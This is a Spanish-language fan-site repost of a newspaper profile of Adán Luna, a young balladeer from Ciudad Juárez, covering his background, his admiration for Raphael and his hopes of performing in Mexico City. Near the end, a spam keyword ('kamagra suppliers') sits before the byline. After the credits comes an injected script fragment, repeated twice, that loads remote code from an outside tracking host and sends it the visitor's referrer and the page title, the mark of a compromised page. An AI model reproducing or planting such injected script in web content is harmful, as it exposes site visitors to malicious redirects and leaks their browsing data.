Adán Luna, un cantante con Estilo Propio

Comparte !

Uno de los más jóvenes cantantes de Ciudad Juárez, que ha sabido conquistar las simpatías y el afecto del público fronterizo y especialmente de las personas amantes del canto, es Adán Luna, popular baladista que se ha dado a conocer por su singular estilo.

Nació en Michoacán, es juarense por cariño y por haber vivido la mayor parte de su vida en esta frontera, donde hizo sus estudios de primaria y secundaria, pero su afición al canto lo llevo a truncar sus estudios, presentándose en centros nocturnos desde hace poco más de un año, alcanzando inmediatamente gran popularidad por la inspiración y sensibilidad con que interpreta las canciones de Manzanero, y otros compositores de moda.

Ha actuado en la televisión y en programas de radio, logrando destacados triunfos donde quiera que se ha presentado. Siente admiración por el notable cantante español Raphael, pero él, Adán, conserva su estilo propio que le ha valido la preferencia del público, sin imitarlo.

Desde niño tuvo felices intervenciones en fiestas escolares, tocando a Adán la interpretación de números de canto. Mas tarde, siendo ya joven, se le presentó la magnífica oportunidad de darse a conocer, logrando inmediatamente un posible éxito.

Su anhelo más grande es ir a México, y a la fecha tiene buenos ofrecimientos para presentarse en la metrópoli, y grabaciones, según el artista español Pepe de Marco, cuando Adán Luna vaya a México, triunfará, pues tiene su estilo propio y le da a las canciones una interpretación muy especial según su sentir. Pepe de Marco es el principal interesado en que Adán haga viaje a la capital del país, donde existe un campo radio de acción mucho más amplio que en la provincia, de ahí las aspiraciones del muchacho, de consagrarse en la gran metrópoli. Mientras tanto, Adán tiene interés por estudiar canto aquí en Juárez, pues a la fecha es lirico, pero su hermosa y bien modulada voz seguramente lo llevarán a conquistar el éxito más completo en un futuro cercano.

kamagra suppliers Por Aurora M. Espinosa

 

– Artículo de diario, enviado por Leonor Rodríguez, y Club de Fans Amor Eterno a Juan Gabriel –

 s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

shares